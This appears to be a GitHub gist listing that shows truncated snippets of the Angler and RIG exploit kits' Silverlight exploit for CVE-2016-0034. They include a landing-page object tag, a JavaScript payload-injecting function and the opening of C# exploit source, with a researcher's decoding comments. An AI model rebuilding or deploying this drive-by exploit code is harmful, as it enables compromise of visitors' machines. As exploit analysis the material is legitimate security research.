Skip to content

Instantly share code, notes, and snippets.

@sammbertram
sammbertram / angler silverlight
Created May 11, 2017 12:23 — forked from nrafter/angler silverlight
angler 2016-3-22 2016-0034 silverlight exploit with vars
"<form id="
form1
" runat="
server
" style="
height: 100 % "><div id="
silverlightControlHost
"><object data="
data:application / x - silverlight - 2, " type="
application / x - silverlight - 2
@sammbertram
sammbertram / rig ek silverlight
Created May 11, 2017 12:23 — forked from nrafter/rig ek silverlight
2016-0034 decoding parameters and shellcode
//RIG landing page contained two exploits, a flash one and this silverlight
//junx. this is the decoded silverlight sploit. i needed to know how it used the vars
a = "function hjkhjk(ghgh) {var payloaad_div = window.document.createElement('div');window.document.body.appendChild(payload_div);payload_div.innerHTML = ghgh;}function ghjdfg(){ghjghj=" < object
data = 'data:application/x-silverlight-2,'
type = 'application/x-silverlight-2'
width = 10
height = 10 > < param
name = 'source'
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;